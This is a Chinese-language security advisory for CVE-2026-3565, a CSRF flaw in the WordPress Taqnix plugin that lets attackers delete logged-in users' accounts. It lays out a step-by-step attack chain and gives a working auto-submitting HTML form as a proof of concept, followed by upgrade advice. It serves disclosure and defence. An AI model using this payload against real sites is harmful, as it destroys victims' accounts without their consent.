IPBUF安全漏洞报告
English
CVE-2026-3565 CVSS 4.3 中危

CVE-2026-3565 WordPress Taqnix插件CSRF漏洞

披露日期: 2026-04-24

漏洞信息

漏洞编号
CVE-2026-3565
漏洞类型
跨站请求伪造 (CSRF)
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
WordPress Taqnix Plugin

相关标签

CSRFWordPressTaqnix插件漏洞账号注销

漏洞概述

WordPress Taqnix插件在1.0.3及之前版本存在CSRF漏洞。由于taqnix_delete_my_account()函数缺少nonce验证,未经身份验证的攻击者可诱导登录用户点击恶意链接,导致用户账户被删除。

技术细节

该漏洞源于WordPress插件Taqnix的`class-taqnix-user.php`文件中。在`taqnix_delete_my_account()`函数的第883行,`check_ajax_referer()`调用被注释掉,导致针对删除账户操作的跨站请求伪造(CSRF)防护失效。攻击者无需管理员权限,只需诱导已登录的非管理员用户访问特制的恶意页面或点击链接,即可利用用户浏览器在不知情的情况下发送删除账户的请求。

攻击链分析

STEP 1
1. 侦察
攻击者确认目标站点安装了存在漏洞的WordPress Taqnix插件(版本<=1.0.3)。
STEP 2
2. 构造载荷
攻击者创建一个包含恶意表单的HTML页面,该表单自动向`/wp-admin/admin-ajax.php`发送POST请求,action参数设为`taqnix_delete_my_account`。
STEP 3
3. 投递诱饵
攻击者将恶意页面链接发送给目标站点的已登录用户,诱导其点击访问。
STEP 4
4. 执行攻击
受害者在已登录状态下访问链接,浏览器自动携带会话Cookie发送删除账户的请求。
STEP 5
5. 达成效果
由于服务器端未验证nonce,请求被处理,导致受害者的账户被删除。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- PoC for CSRF to delete account --> <html> <body> <form action="[TARGET_URL]/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="taqnix_delete_my_account" /> <input type="submit" value="Submit Request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>

影响范围

Taqnix <= 1.0.3

防御指南

临时缓解措施
建议立即将Taqnix插件升级至修复了该漏洞的最新版本。如果暂时无法升级,应禁用该插件中的用户自助删除账户功能,或直接卸载插件以防止攻击。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表